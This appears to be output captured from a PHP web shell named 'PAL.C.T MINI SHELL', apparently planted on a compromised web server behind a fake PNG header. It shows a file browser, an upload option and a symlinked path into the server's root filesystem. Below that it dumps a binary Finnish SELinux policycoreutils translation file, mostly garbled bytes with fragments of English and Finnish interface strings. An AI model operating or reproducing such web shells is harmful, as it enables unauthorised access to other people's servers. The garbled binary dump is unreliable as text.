php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/fi/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/fi/LC_MESSAGES/policycoreutils.mo

$,*X8Y8m8888?8;9&?99f999979/:3:<:P:c:u:::::::::;;,;E;/N;~;;;;G;E;$=<)b<M<5<)=l:=)==2=L">Ko>>">>?!7?'Y?D?B?	@A@@4@&'A,NA%{A2AAKA5=BTsB<BLC(RC,{CPC.CJ(D%sD(D4DD]ECqE(EE$FF%F-FL(GxuGG(G#H<H2DHwHHH2H#H1H2+I^I xI"IIwJK
LLLPL4MRM!hMM"MMMN-N%KN(qN1N*N2N(*OSO%qO$OO OOP"8P$[P!PP%PP Q %QFQ_Q${QQ%QQ$R%R$BR'gRRRRRRS2S"LSoSS S SS ST7T$STxT%TTTTU#(ULUiUUU5UUV!2V(TV!}V"V!V&VW$%W/JW/zW4W2WX?,X$lX)X)X.X,Y)AY)kY.Y,Y)Y)Z.EZ,tZ$Z!ZZ)[.[3[
J[U[	h[	r[|[[[[[
[-[(\)=\2g\2\-\*\*&]%Q]%w]*].],]/$^$T^/y^+^-^+_+/_'[_$_,_-_0`.4`+c`0`4`+`(!a)Ja+ta,a+a#a%b#Cb)gb,b+b+b+c-Bc+pc-c-c.c('d-Pd/~d.d$d)e),e.Ve-e*e*e/	f-9f*gf.f2f+f* g.Kg*zg0g+g-h-0h+^h-h,h+h,i)>i*hi)i&i+i,j*=j,hj,j+j-j*k*Gk*rk*k)k*k%l/Cl-sl)l&l/l-"m/Pm&m0m#m-m-*n*Xn)n%n+n-n+-o$Yo(~o*o*o$o0"p-Sp*p#p+p/p3,q.`q&q4q+q.r*Fr+qr+r+r,r+"s/Ns+~s)s-s*t*-t-Xt/t)t,t+
u/9u0iu*u)u.u-v+Lv,xv.v-v)w*,w)Ww)w,w,wxx1-x:_x9xNx#y5yWBy	y2yJy<"z_z yzz"z+z&{/{+C{#o{{!{%{{|!2| T| u|F|
||
|
}(}	;}E}
X}f}	y};}"}}}}}
~
~'~3~4O~~~ ~6~"+4R	oy

<#	9	CMQV
e
s	ʀԀ%G6~́*<	L
Vah
y2ڂ88Jуރ3&Ls"(܄
<Wd{
Ѕޅ,<:M7߆ -,ڇF&N:u'<ȉGM(_$ŠΊ0ۊ56Byq;|XՌ,g*'.34J24E-CT')9"V,yƐ.:Nc{*đ'ߑ'/]@
	rU3	͓ٓ.*;XLiΔҔ%ڔ4<Q0֕ޕ_N,f4#Ȗ,((Bk"ܗ
)D_}"Ę#7(`dgl$rř͙#ߙ MI^1Gڜ&"GI8ʝΝם 0BT
\g&ٞ&;GO 	ŸޟomU"à6bOHС7*>dXc!/A.q=5ޤ0iEST+?:)z/8ԧb
!pc8_/Pd7E2}n2bR14Q4noW*k*<Į89:dtٯx& 
ȰKӰ"BSCWMA	$K'p!}Ve	{_*1/'a<Ʒ3-=H.2C8,Oe1(6+(b+%(ݺ..5.d%:+ )?i.&ּ97.V+%ͽ'')Cm!%%վ1.-\,z%Ϳ)3.S&91>1p'46?V*,60%.V508)%.O=~?GCD'I6719iA=9#;]C?>@\HD,+%X~:
 &	2<U%i*$,6?6v)'- -!N-p1/232S.0..1D.v0031;.m4/.%0,V...-"> a,/...=0l.001.$`021 ,<,i10-)'-Q0-14.E-t1-3.60e0.0.'.V/,-,0=.n/-//+.[0----E,s-/-0,,]#202"E3h 00-,M/z.0.
!9$[&- -0$-U-.261J"|7.1-8.f.//.$2S.,0--A0o3,/.1'`3-,10I.z/10,<&i,,//J%Y/;Ac-j
(:6XqD3)2]/72%+0Q3')0"9&\ "8 !6X'sZ2o
Q)m@,
5!@&b d>

&*:ey(9I
Ucimqv!$(	8BJQfyJ!
?/=o

%M#j ,	%%K2h &.)GqC/Ts,* $*BQ9O@+J7'?FgK%&8_{=25Oag;,@)m1561G<y>?=5?sL/-'00P-&)"7Tc!(5"/A8qm.	E	[	n	u
"

)



&
1#$Uzb(
4""W=zC1
G

O
]
nd

1
4%#Z'~/8)9)V&#)))?'i!'1$;V.2#
*5!JMjid}` k?0CHb&ig&1,:<A(/E\3on$=ur'9.kzx$aB1hBW:#%{eeSG@6IPFH~	(r(V%3l-CH\S!u@g5 56F	`j70tt{QX&*$3yNd!lG8adYp]vR {XY
rJyJh4jN'-

Fv).UTD=~;IbyU,|<E[OX,*zO0#o;cW+Qf
2sZqpT_f;?i]PvR^I+
|xEwpxDA?wq/h}m^L`J-Sk}u>Rm9Te@*qMm2B^Z8)_!cDQV\KN4f7>os[)_agG~=b2MZwt>|5"CL1YPOn#L
"Ac'4n/<.]7[	V+"9KsUW:l%Kz68%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-08-29 19:56+0300
Last-Translator: Ville-Pekka Vainio <vpivaini@cs.helsinki.fi>
Language-Team: Finnish <laatu@lokalisointi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: fi
Plural-Forms: nplurals=2; plural=(n != 1);
tty %s vaihtoi nimiötä.
%s on jo kohteessa %s%s ei ole kelvollinen konteksti
%s ei ole kohteessa %s%s on oltava hakemisto%s! Ei saatu nykyistä kontekstia tty:lle %s, ei nimiöidä sitä uudelleen.
%s! Ei saatu uutta kontekstia tty:lle %s, ei nimiöidä sitä uudelleen.
%s! Ei voitu asettaa uutta kontekstia tty:lle %s
%s: Ei voida ladata käytäntöä, pyydettiin toimeenpanevaa tilaa: %s
%s: Ei voida ladata käytäntöä: %s
%s: Käytäntö on jo ladattu, silti pyydettiin ensimmäistä latausta
******************** TÄRKEÄÄ ***********************
...600-1024<b>Ohjelmat</b><b>Kirjautuvat käyttäjät</b><b>Pääkäyttäjät</b><b>Valitse:</b><b>TCP-portit</b><b>UDP-portit</b>LisääLisää %sTotuusarvojen lisäysikkunaLisää tiedostokontekstiLisää verkkoporttiLisää SELinux-kirjautumisassosiaatioLisää SELinux-verkkoporttejaLisää SELinux-käyttäjäLisää SELinux-käyttäjäassosiaatioLisää käyttäjäOsoite %s on määritelty SELinux-käytännössä, sitä ei voi poistaaOsoitetta %s ei ole määriteltyYlläpitoYlläpitokäyttäjän rooliKaikkiSalli SELinuxin webadm-käyttäjän hallita niiden käyttäjien kotihakemistoja, joilla ei ole erityisoikeuksiaSalli SELinuxin webadm-käyttäjän lukea niiden käyttäjien kotihakemistoja, joilla ei ole erityisoikeuksiaSalli Samban jakaa nfs-hakemistojaSalli Spam Assassin -taustaprosessille verkon käyttöSalli X-ikkunointipalvelimen määrittää muistialue sekä suoritettavaksi että kirjoitettavaksiAnna kaikille taustaprosesseille mahdollisuus käyttää varaamattomia tty:itäSalli kaikkien taustaprosessien kirjoittaa vedostiedostoja hakemistoon /Salli cdrecodin lukevan eri kohteita, nfs:ää, sambaa, irrotettavia laitteita, käyttäjän väliaikaisia tiedostoja ja epäluotettavia sisältötiedostojaSalli asiakasohjelmien kirjoittaa X:n jaettuun muistiinSalli taustaprosessien toimia NIS:n kanssaSalli Evolutionin ja Thunderbirdin lukea käyttäjätiedostojaSalli gadmin-SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli guest-SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli javalle suoritettava pinoSalli mountin liittää mikä tahansa hakemistoSalli mountin liittää mikä tahansa tiedostoSalli mplayerin suoritettavalle tiedostolle suoritettava pinoSalli tavallisten käyttäjien suorittaa ping-komentoSalli pppd:n suoritus tavallisena käyttäjänäSalli erityisoikeuksilla varustettujen ohjelmien, kuten hotplugin ja insmodin, suoritus rajoittamattominaSalli ohjelmien lukevan epätavallisissa sijainneissa olevia tiedostoja (default_t)Salli rc-komentosarjojen suoritus rajoittamattomana, mukaan lukien kaikki palvelut, jotka rc-komentosarja käynnistää ja joilla ei ole erikseen määriteltyä toimialuesiirtymääSalli tavallisille käyttäjille suora hiiren käyttöoikeus (salli vain X-palvelin)Salli rpm:n suorittaminen rajoittamattomanaSalli sasl-tunnistautumispalvelimen lukea /etc/shadow-tiedostoaSalli spamd:lle pääsy kotihakemistoihinSalli squid-taustaprosessin yhdistää verkkoonSalli ssh-kirjautumiset sysadm_r:sysadm_t-käyttäjiltäSalli ssh:ta suoritettavan inetd:n kautta sen sijaan, että sitä suoritettaisiin taustaprosessinaSalli ssh:n suorittaa ssh-keysignSalli staff-SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli staff-verkkoselainten kirjoittaa kotihakemistoihinSalli staff_r-käyttäjien etsiä sysadm-kotihakemistosta ja lukea tiedostoja (kuten ~/.bashrc)Salli stunnel-taustaprosessin suorittaminen itsenäisesti, xinetd:n ulkopuolellaSalli sysadm-SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli sysadm_t:n käynnistää taustaprosesseja suoraanSalli mozilla-selaimen lukea käyttäjätiedostojaSalli rajoittamattoman SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli nimiöimättömien pakettien kulkea verkossaSalli user-SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli käyttäjän yhdistää mysql-pistokkeeseenSalli käyttäjän yhdistää postgres-pistokkeeseenSalli käyttäjille luku- ja kirjoitusoikeus noextattrfileen (FAT, CDROM, LEVYKE)Salli käyttäjien kutsuvan stat:ia tty-tiedostoilleSalli user_r:n päästä sysadm_r:ksi su:n, sudon tai userhelperin avulla. Muuten vain staff_r voi tehdä niin.Salli käyttäjien hallita verkkoliitäntöjä (tarvitsee myös asetuksen USERCTL=true)Salli käyttäjien suorittaa mount-komentoSalli käyttäjien suorittaa TCP-palvelimia (liittyä portteihin ja hyväksyä yhteys samasta osoitteesta ja ulkopuolisilta käyttäjiltä). Tämän poistaminen käytöstä pakottaa käyttämään FTP:n passiivista tilaa ja saattaa muuttaa muita protokollia.Salli käyttäjien suorittaa dmesg-komentoSalli käyttäjille luku- ja kirjoitusoikeus usb-laitteisiinSalli xdm-kirjautumiset sysadm_r:sysadm_t-käyttäjiltäSalli xenin lukea ja kirjoittaa fyysisille levylaitteilleSalli xguest-SELinux-käyttäjätunnuksen suorittaa kotihakemistossa tai /tmp:ssä olevia tiedostojaSalli xinetd:n suoritus rajoittamattomana, mukaan lukien kaikki palvelut, jotka se käynnistää ja joilla ei ole erikseen määriteltyä toimialuesiirtymääOhjelmaHaluatko varmasti poistaa %s ”%s”?Virheellinen muoto %s: tietue %sTotuusarvoTotuusarvo %s on määritelty SELinux-käytännössä, sitä ei voi poistaaTotuusarvoa %s ei ole määriteltyTotuusarvon nimiCVSMerkkejä + tai - ei voi yhdistää muiden kategoriatyyppien kanssaEi voi olla useita herkkyyksiäEi voida muokata herkkyystasoja käyttämällä ”+”-merkkiä kohteessa %sVarjosalasanatiedostosta ei löydy tämän käyttäjän tietoja.
